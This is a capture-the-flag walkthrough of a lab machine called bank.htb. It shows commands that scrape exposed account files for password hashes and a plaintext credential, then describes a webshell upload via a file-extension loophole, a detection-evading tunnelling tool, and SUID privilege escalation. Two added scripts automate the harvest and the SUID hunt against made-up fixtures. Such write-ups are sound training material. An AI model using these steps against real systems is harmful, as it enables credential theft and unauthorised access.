Not a ton to talk about for this box. It’s an interesting CTF style machine but I’m not sure I’d rank it in the OSCP prep category. Just something fun for a low key Sunday Morning 🙂
Defining The Attack Surface
We have 3 open ports and services running.
- 22 – SSH
- 53 – DNS
- 80 – Web Server (http)
The obligatory Nikto scan doesn't reveal much, so let's look at it in the browser.
Something to note is that our earlier dig scan did identify the domain bank.htb, so I'm going to add that to my /etc/hosts file and try the browser again.
Something interesting to note: I always look at the source of at least the landing page on these things. Sometimes it pans out, sometimes not. This time it looks like we may have found something useful, a debug comment left in the page source. Sticking it in the back pocket for now.
~~MORE ENUMERATION REQUIRED~~
I tried a series of password attacks using the names from the dig output. I inferred that chris.bank.htb was actually an email address, Chris@Bank.htb, so I tried brute forcing it with hydra and rockyou.txt, to no avail. More enumeration is needed.
A wfuzz directory scan got us everything we needed. Among the directories it turned up was balance-transfer. You'll want to check each of these out, but /balance-transfer is where the juicy stuff is: a listing of files, each holding a user record with what looks like a hashed password.
Let’s automate pulling this all down for further inspection
First I fetch the HTML of the listing page with curl:
curl http://bank.htb/balance-transfer/ > transfers_raw
Then I take that HTML over to http://regex101.com. If you don't regex, you're about to see how magical it is.
I pasted all of the HTML into regex101 and then wrote a really simple regex to grab all of the filenames:
(?<=acc">).*?(?=</a>)
What this regex says is
(?<=acc">) start right after acc"> (a lookbehind, so the anchor text itself is not part of the match)
.*? grab everything, lazily, so it stops at the first closing tag rather than the last one on the line
(?=</a>) stop right before </a> (a lookahead, likewise left out of the match)
As you can see from the screenshot above, it successfully grabs all of the filenames. Next I export the matches and stick them in a file called account_links, and now we're ready to pull them all down:
for link in $(cat account_links); do wget http://bank.htb/balance-transfer/"$link" ; done
That command pulled every file down. Then, to make sure I got it all, I cat'd each one out with
for file in $(ls); do cat $file ; done
Let's see what we've got.
First I try and just pull the password lines out. Same command as catting them out, but with a grep in there:
for file in $(ls); do grep "Password" "$file" ; done
Now let's isolate the hash with cut (the second space-separated field, since each line reads Password: followed by the value):
for file in $(ls); do grep "Password" "$file" | cut -d " " -f2 ; done
And there's all of our hashes!
As I was scrolling through them looking for anything that stood out, I came across this nugget: one of the Password fields holds a plaintext password instead of a hash. The file it came from will probably be a different size from the rest, so it should stand out in ls, but one more time with that bash for loop magic, because quick and dirty is my middle name today:
for file in $(ls); do echo $file ; cat $file | grep HTBB4nk ; done
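The whole harvest, from the listing to the odd one out, as an added example that is not part of the original post. It uses only POSIX sh tools; the index HTML and the account files are constructed stand-ins, labelled as such in the script, and the "not a hash" test assumes every real hash is a run of hex digits, which is worth checking against the hashes you actually pulled before trusting the filter.

```shell
#!/bin/sh
# Added example, not from the original post: the balance-transfer harvest as
# one script. The index HTML and the account files below are CONSTRUCTED
# stand-ins for what the box serves; the real layout is assumed to match
# (one <a href="...acc">...</a> per listing line, and one "Password: <value>"
# line per file).

# extract_links FILE: print each .acc filename found in a saved index page.
# Same idea as the regex101 lookaround (start after acc">, stop before </a>),
# written with sed so it needs nothing beyond POSIX.
extract_links() {
    sed -n 's/.*acc">\([^<]*\)<\/a>.*/\1/p' "$1"
}

# fetch_all BASE_URL LIST DEST: the page's wget loop, quoted and quiet.
# Not exercised by the demo below because it needs the live target.
fetch_all() {
    while read -r link; do
        wget -q -P "$3" "$1/$link"
    done < "$2"
}

# harvest_passwords DIR: print "filename value" for every Password: line.
harvest_passwords() {
    for f in "$1"/*.acc; do
        val=$(sed -n 's/^Password: *//p' "$f")
        if [ -n "$val" ]; then
            echo "$(basename "$f") $val"
        fi
    done
}

# find_plaintext DIR: the check the post does by scrolling. Keep only
# entries whose value is NOT a run of hex digits (assumption: every real
# hash is pure hex, so anything else was stored in the clear).
find_plaintext() {
    harvest_passwords "$1" | awk '$2 !~ /^[0-9a-fA-F]+$/'
}

# Constructed fixture so the script runs offline: a three-line index page
# and the three files fetch_all would have pulled down.
demo_dir=$(mktemp -d)
cat > "$demo_dir/index.html" <<'EOF'
<tr><td><a href="1111.acc">1111.acc</a></td></tr>
<tr><td><a href="2222.acc">2222.acc</a></td></tr>
<tr><td><a href="3333.acc">3333.acc</a></td></tr>
EOF
printf 'Full Name: Alice Example\nPassword: 0123456789abcdef0123456789abcdef\n' > "$demo_dir/1111.acc"
printf 'Full Name: Bob Example\nPassword: fedcba9876543210fedcba9876543210\n' > "$demo_dir/2222.acc"
printf 'Full Name: Carol Example\nPassword: Cleartext-Pass-2017\n' > "$demo_dir/3333.acc"

echo "== filenames in the listing =="
extract_links "$demo_dir/index.html"
echo "== Password fields that are not hashes =="
find_plaintext "$demo_dir"
```

Against the real box you would run extract_links on transfers_raw, feed its output to fetch_all with http://bank.htb/balance-transfer as the base URL, and point find_plaintext at the download directory; the awk filter replaces the scroll-and-squint step and prints only the record that does not look like a hash.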
Using our newfound creds, thanks to Chris, we now have access to his account. Not a ton to see here.
Flipping over to the support page, we find a ticket system that allows file uploads.
The first thing I try is uploading a plain text file, which doesn't go through. Then I recalled the little debug comment we found on the landing page about files with the .htb extension. Sure enough, renaming the same file with the .htb extension got it uploaded. The comment also said that the .htb extension would execute as PHP, so this is pretty obviously our attack vector for a shell.
First I test it with a simple PHP script.
Okay, now for the shell. No need to reinvent the wheel: Kali ships a bunch of webshells pre-baked (look under /usr/share/webshells/php). Don't forget to change the IP and port.
Looks like the upload worked! Let's start our listener and open the shell.
Too easy. On to root.
Something I've been in the habit of doing lately is dogfooding my favorite Linux red-team shell, ShinobiShell.
Once it's downloaded to my attacking machine, I start up a Shinobi server:
./ShinobiShell.py -l 444
Next I pull it down to my victim machine.
Starting the Shinobi client is easy. We just give it the -c flag for connect and it will prompt for the attacking server's IP. There are other flags as well; ShinobiShell lets you set up an encrypted tunnel if you wish.
Because you're prompted for the IP, port and encryption key after launch rather than passing them as arguments, none of this lands in the shell history or the process command line, which makes it harder to discover.
First stop is getting our user.txt flag if we can, which on this machine we can.
Now we move on to privilege escalation.
This is where ShinobiShell really shines. It lets you pull and push information, files and exploits to and from your attacking machine, through the tunnel, with single commands.
Something I like to start with is suid3num. You can easily get it on your victim machine with a single command: ShinobiShell sends a request over the tunnel to the Shinobi server, which fetches the latest version of suid3num and sends it back over the tunnel to you.
Once we run suid3num we see there's a binary under /usr/htb/bin/ that has the SUID bit set.
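For anyone who wants to see what suid3num is actually checking, here is the same enumeration done by hand as an added example (not from the post and not suid3num's own code): find every set-uid file and flag the ones that live outside a baseline of stock directories. The baseline directory list is an assumption you should tune per target, and the demo scans a constructed throwaway tree rather than the real root.

```shell
#!/bin/sh
# Added example, not from the original post: the check that suid3num
# automates, written out by hand so you can see what it is looking for.
# It lists every set-uid file under ROOT and flags the ones living outside
# the directories where distro packages normally install SUID binaries.
# The baseline directory list is an assumption; tune it per target.

# list_suid ROOT: every regular file under ROOT with the set-uid bit,
# staying on one filesystem and ignoring unreadable paths.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# is_expected PATH: succeed when PATH (relative to the scanned root, with a
# leading slash) sits in one of the baseline directories.
is_expected() {
    case "$1" in
        /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) return 0 ;;
        *) return 1 ;;
    esac
}

# odd_suid ROOT: the SUID files worth a closer look, i.e. anything in a
# custom location. Run it against / on the target; ROOT exists so the demo
# can scan a throwaway tree instead.
odd_suid() {
    root="$1"
    list_suid "$root" | while read -r p; do
        rel="${p#"$root"}"
        case "$rel" in /*) ;; *) rel="/$rel" ;; esac
        if ! is_expected "$rel"; then
            echo "$p"
        fi
    done
}

# Constructed demo tree: a stock-looking SUID binary, a custom SUID binary
# in a vendor directory, and a normal file that should not show up at all.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/usr/bin" "$demo_root/srv/app/bin"
: > "$demo_root/usr/bin/passwd";     chmod 4755 "$demo_root/usr/bin/passwd"
: > "$demo_root/srv/app/bin/helper"; chmod 4755 "$demo_root/srv/app/bin/helper"
: > "$demo_root/srv/app/bin/plain";  chmod 0755 "$demo_root/srv/app/bin/plain"

echo "== all SUID files under $demo_root =="
list_suid "$demo_root"
echo "== SUID files outside the baseline =="
odd_suid "$demo_root"
```

On a real target you would run odd_suid / and read the short list that comes back; a set-uid binary sitting in a one-off directory is exactly the kind of thing the post stumbles onto next, and it is worth checking what it does before running it, even if yolo works out this time.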
I decided to yolo and just run it to see what happened … Maybe we’ll get some help text on what it does
JK WE ROOT lol
And that’s the box